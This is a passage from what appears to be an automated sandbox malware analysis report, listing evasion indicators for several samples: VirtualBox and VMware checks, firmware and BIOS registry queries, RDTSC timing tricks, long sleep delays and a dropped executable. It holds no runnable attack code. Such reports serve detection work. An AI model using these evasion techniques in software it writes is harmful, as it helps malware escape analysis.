                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: audiodgse.exe PID: 2352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sbinzx.exe PID: 6748, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\a\setup.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\a\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\a\sbinzx.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\a\sbinzx.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000028D9904 second address: 00000000028D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002569904 second address: 000000000256990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000028D9B7E second address: 00000000028D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002569B6E second address: 0000000002569B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599777s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598905s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598794s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598686s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598440s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -598093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597653s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597435s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -597000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -596013s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595904s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595356s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -595138s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594786s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594619s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -594044s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -593906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -593750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -593578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -593401s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exe TID: 6560Thread sleep time: -593290s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exe TID: 1416Thread sleep time: -35529s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exe TID: 3652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3632Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exe TID: 1100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 7380Thread sleep time: -17834000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 7456Thread sleep count: 3249 > 30
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 7456Thread sleep time: -6498000s >= -30000s
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 7456Thread sleep count: 6722 > 30
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 7456Thread sleep time: -13444000s >= -30000s
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7808Thread sleep count: 9970 > 30
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7808Thread sleep time: -19940000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 5929 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep count: 2933 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 7732Thread sleep count: 9972 > 30
                    Source: C:\Windows\SysWOW64\raserver.exe TID: 7732Thread sleep time: -19944000s >= -30000s
                    Source: C:\Program Files (x86)\rGrAmoMoqMwuTqnZRCybwYGKPnpcLDMjCfBRghbDIpwgyLgTSyrgXdXQGZfChuqeGs\LkeNkIcFYvnikmw.exe TID: 7820Thread sleep time: -40000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599777Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598794Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598686Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598440Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597653Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597435Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596013Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595904Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595356Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 595138Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594786Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594619Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594469Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 594044Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593750Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593578Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593401Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 593290Jump to behavior
                    Source: C:\Users\user\Desktop\a\audiodgse.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\a\sbinzx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\New_Text_Document.exeWindow / User API: threadDelayed 6244Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeWindow / User API: threadDelayed 3442Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8917Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 858Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 3249
                    Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 6722
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9970
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5929
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2933
                    Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 9972
                    Source: C:\Users\user\Desktop\a\audiodgse.exeAPI coverage: 1.3 %
                    Source: C:\Users\user\Desktop\a\sbinzx.exeAPI coverage: 1.9 %
                    Source: C:\Users\user\Desktop\New_Text_Document.exeDropped PE file which has not been started: C:\Users\user\Desktop\a\smss.exeJump to dropped file
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A096E rdtsc 8_2_012A096E
                    Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\a\setup.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\Desktop\a\setup.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\Desktop\a\setup.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599777Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598794Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598686Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598440Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598312Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597653Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597435Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\New_Text_Document.exeThread delayed: delay time: 596343Jump to behavior
